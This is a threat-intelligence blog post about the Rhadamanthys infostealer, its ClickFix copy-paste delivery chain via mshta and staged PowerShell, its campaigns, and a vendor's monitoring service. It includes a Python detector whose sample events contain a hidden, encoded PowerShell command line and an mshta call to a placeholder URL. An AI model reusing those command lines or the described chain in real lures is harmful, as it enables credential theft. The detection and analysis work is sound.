Rhadamanthys Update: New “ClickFix” Delivery Chain and Threat Insights

Posted on August 26, 2025

A few months ago, we explored the rapid rise of Rhadamanthys, a sophisticated information-stealing malware making waves across the underground. Since then, the threat has continued to evolve, adopting new delivery techniques and expanding its capabilities. 

One of the most notable recent developments is the use of the “ClickFix” delivery chain, a social engineering tactic that tricks victims into running malicious code themselves under the guise of fixing a technical issue.

In this follow-up, we’ll break down how Rhadamanthys operators are weaponizing ClickFix, walk through the technical stages of its latest campaigns, and highlight other key updates that defenders need to know.

The “ClickFix” Tactic: Phishing Gets an Upgrade

ClickFix (also called ClearFix) is a clever phishing scheme where attackers present a bogus error or verification step and instruct the user to copy-paste a provided command (often PowerShell) to resolve it.

By doing so, the unwitting user executes the malware payload, bypassing many automated defenses. This method emerged in late 2024 and has only gained momentum in 2025.

Security teams have observed that threat actors previously using ClickFix for other malware (notably the Lumma stealer) have now pivoted to using it for Rhadamanthys campaigns. 

Rhadamanthys is an attractive payload: it’s stealthy, feature-rich, and (thanks to being sold as Malware-as-a-Service) widely available to cybercriminals.

A recent phishing campaign is a good example of how Rhadamanthys piggybacks on the ClickFix technique. The attack email was crafted as a verification request from what looked like a trusted company. It instructed the recipient to run a command as part of a security check. 

The command provided was a one-liner that invoked mshta.exe with a URL and an access code. If a recipient followed the steps, they unknowingly launched an HTA (HTML application) that executed an obscured PowerShell script in the background.

From there, a three-stage malware dropper took over:

  • Stage 1: A PowerShell snippet runs with window visibility turned off (-w 1), so the user sees no prompt. It then performs some junk operations (like sorting bytes in a fixed “random” way) – simple obfuscation to hide the real code’s intent. This ultimately decrypts and launches a second-stage payload.
  • Stage 2: A larger PowerShell blob (Base64-encoded and then UTF-32 decoded) executes, retrieving an intermediate malware file (around 10 MB, itself protected with layers of obfuscation via Agile.NET). This stage connects out to download the final payload from a remote server.
  • Stage 3: The final stage is the Rhadamanthys infostealer (v0.7.0), now loaded into memory and activated.
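The chain above leaves a recognizable footprint in process-creation telemetry: mshta.exe started with a remote URL, then a hidden-window, encoded PowerShell child. The following detection logic is an added example (not code from the original post or from Twilight Cyber) that runs over constructed Sysmon-style events; the URL, PIDs and encoded string are placeholders.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
# Entries 4102 and 4103 mimic the ClickFix chain: mshta.exe fetching a remote HTA,
# which then spawns a hidden, encoded PowerShell (-w 1 == -WindowStyle Hidden).
SAMPLE_EVENTS = [
    {"pid": 4101, "ppid": 3900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4102, "ppid": 4101, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://verification.example.invalid/check?code=PLACEHOLDER"},
    {"pid": 4103, "ppid": 4102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w 1 -nop -ep bypass -enc QQBBAEEAQQA="},
    {"pid": 4104, "ppid": 4101, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},          # local HTA, benign here
    {"pid": 4105, "ppid": 4101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},          # visible window, not encoded
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# -w 1 / -w hidden / -WindowStyle Hidden
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a payload
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+\S+", re.IGNORECASE)


def image_name(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_clickfix_chain(events):
    """Return (severity, pid, reason) tuples for events matching the mshta -> hidden PowerShell pattern."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name, cmd = image_name(e["image"]), e["cmdline"]
        if name == "mshta.exe" and URL_RE.search(cmd):
            findings.append(("medium", e["pid"], "mshta.exe launched with a remote URL"))
        if name == "powershell.exe":
            parent = by_pid.get(e["ppid"])
            if parent and image_name(parent["image"]) == "mshta.exe":
                findings.append(("high", e["pid"], "PowerShell spawned by mshta.exe"))
            if HIDDEN_RE.search(cmd) and ENCODED_RE.search(cmd):
                findings.append(("medium", e["pid"], "hidden-window PowerShell with encoded command"))
    return findings


if __name__ == "__main__":
    for severity, pid, reason in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"[{severity}] pid={pid}: {reason}")
```

The parent-child rule is the strongest signal; the two single-event rules are kept separate so the mshta stage can be caught even if the PowerShell child is missed.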

Once Rhadamanthys is running on the victim’s machine, it’s game over for data security. This stealer is designed to vacuum up a wide range of sensitive information. It immediately harvests system details, stored passwords, browser cookies, saved logins, cryptocurrency wallet files, and more. 

Rhadamanthys even has modules to scrape text from images or screenshots, using OCR techniques to capture things like 2FA backup codes or cryptocurrency seed phrases that users might have saved as images. Almost nothing is off-limits. 

It targets mainstream software (Chrome, Outlook, Discord, VPN clients) as well as niche apps like the Pale Moon browser or Auvita cryptocurrency wallets. All stolen data is encrypted and exfiltrated to the attackers’ remote server within minutes, ready to be monetized.

It’s no accident that ClickFix campaigns have made Rhadamanthys their payload of choice. An attack that combines stealthy initial access (via user-triggered scripts) with a stealthy infostealer in the final stage is highly likely to slip past traditional defenses. 

Rhadamanthys is Poised to Dominate

Twilight Cyber data confirms that LummaC2 remains by far the most active infostealer, responsible for more than 2.8 million infections in 2025 alone. But Rhadamanthys has carved out a strong second place, with over 235,000 infections recorded in the same period.

Rhadamanthys is sold as a service (MaaS), meaning any criminal affiliate can purchase access to a build and run their own campaigns. This model has fueled its steady rise, empowering both organized cybercrime groups and low-skilled “script kiddies” to weaponize the malware. 

With continuous updates, an easy-to-use dashboard, and strong underground adoption, Rhadamanthys has become the runner-up to Lumma and the most credible challenger in the infostealer ecosystem.

Recent developments and trends around Rhadamanthys:

Aggressive Global Campaigns:
Throughout late 2024 and 2025, Rhadamanthys has appeared in numerous phishing campaigns. One large-scale operation dubbed “CopyRobin(hood)adamantys” leveraged fake copyright infringement notices to target victims across North America, Europe, East Asia, and South America. 

The attackers impersonated dozens of well-known companies (adapting logos and languages for each region) and tricked recipients into downloading password-protected archives carrying the stealer. 

Other campaigns masqueraded as hotel booking confirmations, financial documents, or business support emails. The common theme is social engineering at scale.

Affiliate Adoption and Dark Web Popularity:
Criminal forums have seen increased promotion of Rhadamanthys. The stealer is actively marketed on dark web marketplaces and Telegram channels as a reliable credential-gathering tool. 

Its affordability and strong support (regular updates, bug fixes, even tech support for buyers) lower the barrier to entry for cybercriminals. This means many new threat actors, from small-time fraudsters to initial access brokers, are choosing Rhadamanthys as their tool of choice. 

Continuous Evolution:
Rhadamanthys’s developers have proven keen to one-up the competition. The malware’s modular framework allows them to rapidly introduce new capabilities. New delivery methods are also quite common, as demonstrated with the adoption of the ClickFix social engineering chain by affiliates.

If web browsers harden against certain attacks, the malware can update to find a workaround. If defenders get better at detecting one behavior, the authors can push a new version with altered tactics. This agility keeps Rhadamanthys one of the most effective and hard-to-detect infostealers in circulation.

Broader Range of Threat Actors:
While infostealers are typically associated with financially motivated cybercrime groups, Rhadamanthys has also surfaced in espionage and state-aligned operations. In one case, an Iranian APT group (tracked as Void Manticore) deployed Rhadamanthys as part of a targeted campaign in the Middle East, disguising it as a software update for F5 networking equipment.

Even nation-state actors recognize the value of grabbing credentials at scale, and have opted to use an “off-the-shelf” stealer like Rhadamanthys rather than custom malware, likely because it’s effective and readily available. 

Evolving Delivery Vectors:
Email phishing remains the primary path for Rhadamanthys infections, but it’s not the only one. We’ve seen malvertising (malicious ads on search results) that trick users into downloading trojanized software installers laced with Rhadamanthys. 

We’ve also seen abuse of collaboration platforms. For example, hijacked or fake Discord server invites that lead users to malware in the guise of “verification bots,” often using the ClickFix technique to deploy payloads via hidden scripts.

The recent spike in “HTML smuggling” (where an HTML attachment carries encoded malware or scripts) pairs perfectly with Rhadamanthys, since HTML files can easily implement ClickFix-style tricks. Organizations therefore must be vigilant on multiple fronts, not just email gateways.

Staying Ahead of Infostealers With Twilight

200,000 new infostealer infections occur every day. Without real-time visibility into stolen credentials, your organization could already be compromised and not know it.

This is where Twilight Cyber can help. Our mission is to detect and stop threats like Rhadamanthys before they wreak havoc on your organization’s accounts.

Our Identity Threat Protection platform continuously monitors dark web markets, infostealer log dumps, and malware C2 feeds for any sign of your organization’s credentials being leaked. We leverage a proprietary database of compromised data (updated hourly) to instantly flag when an employee’s password or cookie shows up in a Rhadamanthys haul. 

If detected, we alert you in real-time and provide actionable intelligence, including which user, which machine, and what data was stolen, so you can respond immediately (e.g. forcing password resets, invalidating sessions) and prevent a potential breach.

Interested in seeing if your organization’s credentials have already appeared in stealer logs?

For more information, get in touch with Twilight Cyber for a live demo of our Identity Threat Protection platform. 
